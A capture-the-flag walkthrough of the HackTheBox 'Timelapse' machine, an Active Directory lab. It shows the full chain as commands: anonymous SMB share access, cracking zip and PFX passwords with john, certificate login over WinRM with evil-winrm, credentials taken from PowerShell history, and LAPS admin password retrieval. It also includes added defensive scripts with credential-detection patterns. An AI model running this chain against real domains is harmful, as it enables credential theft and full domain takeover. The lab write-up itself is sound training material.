
HackTheBox - Timelapse

Machine logo

Configuration

It is useful to add the machine's IP address to /etc/hosts: the hostname (and any subdomains it serves) then resolves, and you do not have to remember the address every time.

$ echo '10.10.11.152 timelapse.htb' | sudo tee -a /etc/hosts 

Reconnaissance

$ nmap -p- timelapse.htb -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-29 11:10 UTC
Nmap scan report for timelapse.htb (10.10.11.152)
Host is up (0.056s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5986/tcp  open  wsmans
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49696/tcp open  unknown
62020/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 111.03 seconds

It looks like an Active Directory domain.
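The conclusion above comes from the combination of services, not any single port: Kerberos (88), LDAP (389/636) and the Global Catalog (3268/3269) together are what a domain controller exposes, and 5986 is WinRM over HTTPS, which the rest of the walkthrough uses. The script below is an added example (not from the original post) that parses plain nmap output and applies that fingerprint; the port table and the scan excerpt are constructed from the output shown above.

```python
import re

# Services whose combination characterises an Active Directory domain controller.
# Constructed for this example from the ports the scan above reported.
DC_INDICATOR_PORTS = {
    88: "Kerberos", 389: "LDAP", 445: "SMB", 464: "kpasswd",
    636: "LDAPS", 3268: "Global Catalog LDAP", 3269: "Global Catalog LDAPS",
    9389: "AD Web Services",
}
# Remote-management listeners worth recording separately (5986 is WinRM over HTTPS).
MGMT_PORTS = {3389: "RDP", 5985: "WinRM (HTTP)", 5986: "WinRM (HTTPS)"}

PORT_LINE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)")

def parse_open_ports(nmap_output: str) -> dict[int, str]:
    """Return {port: service} for every open TCP line of plain nmap output."""
    ports = {}
    for line in nmap_output.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            ports[int(m.group(1))] = m.group(2)
    return ports

def classify_host(open_ports: dict[int, str]) -> dict:
    """Decide whether the open-port set looks like a domain controller."""
    dc_hits = sorted(p for p in open_ports if p in DC_INDICATOR_PORTS)
    # Kerberos plus LDAP plus the Global Catalog is the decisive combination;
    # a member server or workstation exposes SMB/RPC but not these three.
    likely_dc = {88, 389, 3268}.issubset(dc_hits)
    return {
        "likely_dc": likely_dc,
        "dc_ports": dc_hits,
        "management_ports": sorted(p for p in open_ports if p in MGMT_PORTS),
    }

# Constructed sample: an excerpt of the scan output above.
SAMPLE_SCAN = """\
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
389/tcp   open  ldap
445/tcp   open  microsoft-ds
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5986/tcp  open  wsmans
"""
```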

Enumeration

Let’s start with SMB enumeration. This can also be done with plain smbclient.

$ crackmapexec smb timelapse.htb -u 'a' -p '' --shares
SMB         timelapse.htb   445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB         timelapse.htb   445    DC01             [+] timelapse.htb\a: 
SMB         timelapse.htb   445    DC01             [+] Enumerated shares
SMB         timelapse.htb   445    DC01             Share           Permissions     Remark
SMB         timelapse.htb   445    DC01             -----           -----------     ------
SMB         timelapse.htb   445    DC01             ADMIN$                          Remote Admin
SMB         timelapse.htb   445    DC01             C$                              Default share
SMB         timelapse.htb   445    DC01             IPC$            READ            Remote IPC
SMB         timelapse.htb   445    DC01             NETLOGON                        Logon server share 
SMB         timelapse.htb   445    DC01             Shares          READ            
SMB         timelapse.htb   445    DC01             SYSVOL                          Logon server share

We can read two shares (IPC$ and Shares) without logging in, so we connect with smbclient and look around.

$ smbclient -N \\\\timelapse.htb\\Shares\\
smb: \> dir
  .                                   D        0  Mon Oct 25 15:39:15 2021
  ..                                  D        0  Mon Oct 25 15:39:15 2021
  Dev                                 D        0  Mon Oct 25 19:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 15:48:42 2021

                6367231 blocks of size 4096. 1680031 blocks available
smb: \> cd Dev
smb: \Dev\> dir
  .                                   D        0  Mon Oct 25 19:40:06 2021
  ..                                  D        0  Mon Oct 25 19:40:06 2021
  winrm_backup.zip                    A     2611  Mon Oct 25 15:46:42 2021

                6367231 blocks of size 4096. 1680031 blocks available
smb: \Dev\> get winrm_backup.zip
smb: \Dev\> cd ..
smb: \> cd HelpDesk
smb: \HelpDesk\> dir
  .                                   D        0  Mon Oct 25 15:48:42 2021
  ..                                  D        0  Mon Oct 25 15:48:42 2021
  LAPS.x64.msi                        A  1118208  Mon Oct 25 14:57:50 2021
  LAPS_Datasheet.docx                 A   104422  Mon Oct 25 14:57:46 2021
  LAPS_OperationsGuide.docx           A   641378  Mon Oct 25 14:57:40 2021
  LAPS_TechnicalSpecification.docx      A    72683  Mon Oct 25 14:57:44 2021

                6367231 blocks of size 4096. 1680031 blocks available
smb: \HelpDesk\> mget *

The winrm_backup.zip archive is password-protected, so we try to crack it with john.

$ zip2john winrm_backup.zip > hash
$ john --wordlist=rockyou.txt hash
-- EDITED --    (winrm_backup.zip/legacyy_dev_auth.pfx)

legacyy_dev_auth.pfx is a PKCS#12 file, which bundles an X.509 certificate (public key) with the corresponding private key. It is protected by a password, so we convert it to a hash and crack it again.

$ pfx2john legacyy_dev_auth.pfx > hash
$ john --wordlist=rockyou.txt hash
-- EDITED --       (legacyy_dev_auth.pfx)

Now that we have the password, we can extract the certificate and the private key with openssl.

$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out private.key
$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out certificate.crt

user.txt

With the certificate and private key we can authenticate to the machine over WinRM (HTTPS on port 5986) using evil-winrm.

$ evil-winrm -i timelapse.htb -S -k private.key -c certificate.crt
*Evil-WinRM* PS C:\Users\legacyy\Documents>
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd ..
*Evil-WinRM* PS C:\Users\legacyy> type Desktop\user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX # Edited

root.txt

Here we have to look around. Checking the Program Files folder shows that LAPS is installed and enabled. Uploading and running winPEAS points us to a PowerShell command history file.

PowerShell history file

Let’s open it!

*Evil-WinRM* PS C:\Users\legacyy\Downloads> type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString '-- EDITED --' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

The credentials are right there in the history: svc_deploy:-- EDITED --.
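The same history file matters from the defensive side: PSReadLine records every interactive command, so a password typed into ConvertTo-SecureString persists on disk in plaintext, and the -SkipCACheck/-SkipCNCheck/-SkipRevocationCheck options record that TLS validation was switched off. The scanner below is an added example (not from the original post) that flags such lines and masks the secret in its report; the sample history and the placeholder password are constructed.

```python
import re

# Rules for credential material that commonly lands in PSReadLine history.
# Constructed for this example around the commands seen in the history above.
FINDINGS = [
    ("plaintext password in ConvertTo-SecureString",
     re.compile(r"""ConvertTo-SecureString\s+(['"])(?P<secret>.+?)\1.*-AsPlainText""", re.I)),
    ("username bound into a PSCredential",
     re.compile(r"""PSCredential\s*\(\s*['"](?P<user>[^'"]+)['"]""", re.I)),
    ("TLS validation disabled on remoting session",
     re.compile(r"-Skip(CACheck|CNCheck|RevocationCheck)", re.I)),
]

def mask(value: str) -> str:
    """Keep only the first and last character so the report never re-leaks the secret."""
    return value if len(value) <= 2 else value[0] + "*" * (len(value) - 2) + value[-1]

def scan_history(text: str) -> list[dict]:
    """Return one finding per matching history line: line number, rule, detail."""
    results = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for rule, pattern in FINDINGS:
            m = pattern.search(line)
            if not m:
                continue
            detail = m.group(0)          # default: the matched fragment
            groups = m.groupdict()
            if groups.get("secret"):     # never emit the secret itself
                detail = "secret=" + mask(groups["secret"])
            elif groups.get("user"):
                detail = "user=" + groups["user"]
            results.append({"line": lineno, "rule": rule, "detail": detail})
    return results

# Constructed sample mirroring the ConsoleHost_history.txt above, with a
# placeholder password in place of the redacted one.
SAMPLE_HISTORY = """\
whoami
ipconfig /all
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'Placeholder#Pass1' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
"""
```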

The svc_deploy user is a member of the LAPS_Readers group, which is allowed to read the LAPS-managed local Administrator password. We use crackmapexec to retrieve it.

$ crackmapexec smb timelapse.htb -u 'svc_deploy' -p '-- EDITED --' --laps  
SMB         timelapse.htb   445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB         timelapse.htb   445    DC01             [-] DC01\administrator:-- EDITED -- STATUS_LOGON_FAILURE

That gives us administrator:-- EDITED --. Time to log in and get the flag!

$ evil-winrm -i timelapse.htb -u 'administrator' -p '-- EDITED --' -S
*Evil-WinRM* PS C:\Users\Administrator\Documents> gci -Path C:\ -Recurse -Include 'root.txt'
    Directory: C:\Users\TRX\Desktop
-ar---         7/1/2022   9:25 AM             34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../../TRX/Desktop/root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX # Edited

It was in an unusual location, so we had to search for it with Get-ChildItem.

Conclusion

I’ve really enjoyed the box. It was interesting to learn some new things.

Thank you for reading, I hope it was useful for you ❤️

This post is licensed under CC BY 4.0 by the author.